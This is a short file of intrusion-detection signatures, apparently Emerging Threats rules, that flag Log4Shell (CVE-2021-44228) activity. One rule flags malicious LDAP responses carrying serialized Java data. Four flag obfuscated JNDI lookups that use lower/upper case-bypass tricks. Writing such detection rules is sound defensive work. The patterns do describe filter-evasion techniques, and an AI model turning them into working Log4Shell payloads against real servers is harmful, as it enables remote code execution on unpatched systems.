alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2"; flow:established,to_client; content:"|30|"; startswith; content:"|04 0d|javaClassName"; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 12|javaSerializedData"; within:25; content:"|ac ed|"; within:10; content:"|2e|exec"; distance:0; content:"FromCharCode"; nocase; distance:0; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034769; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category ATTACK_RESPONSE, updated_at 2021_12_20;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|lower|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034808; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|lower|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034809; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034810; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034811; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;)

```